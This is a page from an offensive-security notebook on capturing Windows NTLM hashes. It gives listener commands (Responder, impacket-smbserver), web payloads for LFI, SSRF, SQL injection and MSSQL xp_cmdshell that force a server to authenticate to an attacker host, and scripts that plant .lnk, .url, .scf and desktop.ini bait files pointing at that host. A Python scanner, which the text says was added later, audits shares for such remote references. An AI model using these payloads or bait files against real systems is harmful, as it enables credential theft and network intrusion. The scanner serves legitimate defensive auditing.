PwnBook

Capturing NTLM hashes

Listener

responder -I <interface>
impacket-smbserver share /dev/null -smb2support

Possible Attacks

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Via web vulnerability

If you discover a web vulnerability (such as LFI, SQLi, XXE, SSRF or SSTI) that lets you include remote files, you can point it at your listener: the server then tries to authenticate to it, which exposes the NTLM hash of the user running the process. For example:

# LFI
?page=\\<attacker>\test

# SSRF
?url=file://<attacker>/test

# SQL Injection
?id=1' union select null,load_file('\\\\<attacker>\\test'),null-- -

  ## MSSQL
  ?id=1' union select null,(select x from OpenRowset(BULK '\\<attacker>\test',SINGLE_CLOB) R(x)),null-- -
  ?id=1' union select null,(EXEC xp_cmdshell 'dir \\<attacker>\test'),null-- -

Via .lnk file

# With PowerShell
$targetPath = "\\<attacker>\test"
$shortcutPath = "C:\path\to\your\~shortcut.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

Via .url file

echo '[InternetShortcut]' > ~shortcut.url
echo 'URL=file:////<attacker>/test' >> ~shortcut.url

Via .scf file

This does not work on newer Windows versions.

echo '[Shell]' > ~file.scf
echo 'Command=2' >> ~file.scf
echo 'IconFile=explorer.exe,3' >> ~file.scf
echo '[Taskbar]' >> ~file.scf
echo 'Command=ToggleDesktop' >> ~file.scf
echo '[InternetShortcut]' >> ~file.scf
echo 'URL=file:////<attacker>/test' >> ~file.scf

Via desktop.ini file

This does not work on newer Windows versions.

# With PowerShell
echo '[.ShellClassInfo]' > desktop.ini
echo 'IconResource=\\<attacker>\test' >> desktop.ini
attrib +s +h desktop.ini
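
For whoever owns a writable share, the .url, .scf and desktop.ini files above can be audited by checking every INI value for a UNC path or file: URL that names a remote host. This is an added example, not part of the original page; the sample files, placeholder hosts and allow-list are constructed assumptions, and binary .lnk files are not covered.

```python
import re

# Constructed samples in the formats shown on this page; 198.51.100.7 and
# fileserver.example are placeholder hosts, not values from the page.
SAMPLES = {
    "~shortcut.url": "[InternetShortcut]\nURL=file:////198.51.100.7/test\n",
    "desktop.ini": "[.ShellClassInfo]\nIconResource=\\\\198.51.100.7\\test\n",
    "docs.url": "[InternetShortcut]\nURL=https://intranet.example/wiki\n"
                "IconFile=C:\\Windows\\System32\\shell32.dll\n",
    "local.url": "[InternetShortcut]\nURL=file:///C:/Users/Public/readme.txt\n",
    "team.scf": "[Shell]\nCommand=2\nIconFile=\\\\fileserver.example\\icons\\team.ico\n",
}

# UNC path (\\host\...) or file: URL with a host (file://host/..., file:////host/...)
REMOTE = re.compile(r"^(?:\\\\|file:/{2,})([^\\/]+)[\\/]", re.IGNORECASE)

def remote_host(value):
    """Return the host a value would make Windows contact, or None if local."""
    m = REMOTE.match(value.strip().strip('"'))
    if not m:
        return None
    host = m.group(1).lower()
    # Drive letter (file:///C:/...), loopback, or \\.\ and \\?\ device paths
    if host.endswith(":") or host in ("localhost", "127.0.0.1", ".", "?"):
        return None
    return host

def scan_ini(text, allowed_hosts=()):
    """Yield (section, key, host) for each value that points at a remote host."""
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            host = remote_host(value)
            if host and host not in allowed_hosts:
                yield section, key.strip(), host

def scan_files(files, allowed_hosts=()):
    """Map file name -> findings, omitting files with no remote references."""
    return {name: hits for name, text in files.items()
            if (hits := list(scan_ini(text, allowed_hosts)))}

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES, {"fileserver.example"}).items():
        print(name, hits)
```

Pass the organisation's own file servers as allowed_hosts so that only references to unexpected hosts are reported.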

Last updated 1 month ago